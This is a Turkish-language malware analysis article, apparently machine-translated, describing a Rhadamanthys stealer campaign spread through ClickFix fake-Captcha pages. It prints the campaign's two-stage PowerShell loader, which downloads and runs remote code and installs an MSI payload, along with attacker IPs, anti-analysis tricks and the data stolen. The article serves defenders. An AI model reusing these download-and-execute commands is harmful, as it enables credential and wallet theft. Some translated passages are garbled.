Rhadamanthys ilk olarak 2022’de hizmet olarak kötü amaçlı yazılım modeli altında satılan modüler bir stealer olarak ortaya çıktı, ancak son kampanyası ne kadar hızlı yenilik yaptığını gösteriyor.
Yeni dalganın merkezinde, kurbanlara bir PowerShell komutunu yapıştırarak oturumlarını “doğrulamalarını” talimat veren ClickFix olarak adlandırılan bubi tuzaklı bir Captcha sayfası var.
Bir kez yürütüldüğünde, komut sessizce uzanır hxxps://ypp-studio[.]com/update.txtYürütme-Policy korumalarını kapatır ve bir sonraki aşamalı yükü belleğe getirir-son damlaya kadar tam olarak sayılır.
Dark Atlas analistleri, cazibe sayfalarının taze kayıtlı yazım yazıları üzerinde barındırıldığını, genellikle YouTube ortağı stüdyosunu veya benzeri SaaS portallarını taklit ettiğini ve temel altyapının daha önce taşındığını belirtti. 77.239.96.51/rh_0.9.0.exe ev sahipliği yapmak 62.60.226.74/PTRFHDGS.msi.
Bu ince değişim, stealer’ın dağıtım zincirini korurken birçok güvenlik aracı tarafından kullanılan sert kodlu IOC’leri kırar.
Kampanya telemetrisi, Haziran ve Temmuz 2025 başında küçük-orta ve Temmuz başlarında enfeksiyonlarda önemli bir artış göstermektedir ve çalıntı tarayıcı çerezleri ve karanlık web pazarlarında uzlaşma saatleri içinde bulut kimlik bilgileri görünmektedir.
ClickFix’i özellikle güçlü yapan şey, sosyal mühendislik katmanıdır. Captcha ekranı sahte bir meşruiyet duygusu sunarken, kurbanı tam olarak bastırmaya yönlendirir Win + Rkomutu yapıştırın ve vur Girmek.
Bu tek eylem, geleneksel e-posta ağ geçidi filtrelerini atlar ve çoğu mavi takımın avladığı makroları önler.
.webp)
Bir kullanıcı güven verici “Doğrulama tamamlandı!” Pop-up, Rhadamanthys zaten arka planda paketini açtı ve verileri C2’ye sifonlamaya başladı. 193.109.85.136.
Enfeksiyon mekanizması
İlk PowerShell komutu, dize tabanlı dedektörlerden kaçmak için karma sembollerle yoğun bir şekilde yastıklıdır, ancak sadece iki fonksiyonel çizgiye dönüşür:-
# Stage 1 – clipboard payload
$u='hxxps://ypp-studio[.]com/update.txt'; (New-Object Net.WebClient).DownloadString($u) | iex
# Stage 2 – decoded from Stage 1
Invoke-WebRequest -Uri http://62.60.226.74/PTRFHDGS.msi -OutFile $env:AppData+'\PTRFHDGS.msi';
Start-Process msiexec.exe -ArgumentList '/i', $env:AppData+'\PTRFHDGS.msi';Aşama 1 sadece bellekte yaşar; 2. Aşama MSI yükleyicisini şöyle yazar. PTRFHDGS.msihangi düşüyor rh_0.9.0.exe ve onu başlatır msiexec böylece ebeveyn/çocuk korelasyonları iyi huylu görünür.
Yürütülebilir dosyalar derhal çalışma süreçlerini numaralandırır, gibi hata ayıklayıcılar için avlar x64dbg.exe– ida64.exeveya ProcessHacker.exe; Bulunursa, analizi hayal kırıklığına uğratmak için kendini sonlandırır.
Kullanarak zamana dayalı anti-sandbox kontrolleri ile takip edilir QueryPerformanceCountersonra enjekte eder WerFault.exe– İkili raporlama konusunda güvenilir bir Windows hatası – devam etmek ve pes etmek için.
Sabit kodlu IP’ye tek bir TCP akışı, tarayıcı veritabanları, kripto-wallet dosyaları ve Keepass kasaları içeren sıkıştırılmış arşivler taşır.
.webp)
Ekran görüntüleri aracılığıyla yakalandı BitBlt operatörlere kurban faaliyetine gerçek zamanlı bir pencere vererek eklenir.
Rhadamanthys C2’sini gerçek IP ile çözdüğü için, DNS-katman savunmaları hiçbir şey görmüyor ve 443 bağlantı noktası üzerindeki şifrelenmiş TL’ler normal trafikle sorunsuz bir şekilde karışıyor.
ClickFix kampanyası, rakip savunmaları atlamak için düşük sürtünmeli lolbins ile sosyal mühendisliği nasıl birleştirebileceğini vurgulamaktadır.
İmza tabanlı kuralların icra-politika baypaslarını içerecek şekilde güncellenmesi, çocuk süreçlerini izleme msiexec.exeve pano kaynaklı PowerShell’de uyarmak, savunucuların göz önünde bulundurması gereken acil adımlardır.
Yine de daha geniş ders davranışsaldır: kullanıcılardan kod çalıştırmasını isteyen herhangi bir “doğrulama” istemi şüphelidir – özellikle düzelttiği tek şey saldırganın dayanağı olduğunda.
Canlı kötü amaçlı yazılım davranışını araştırın, bir saldırının her adımını izleyin ve daha hızlı, daha akıllı güvenlik kararlarını alın -> Herhangi birini deneyin. Şimdi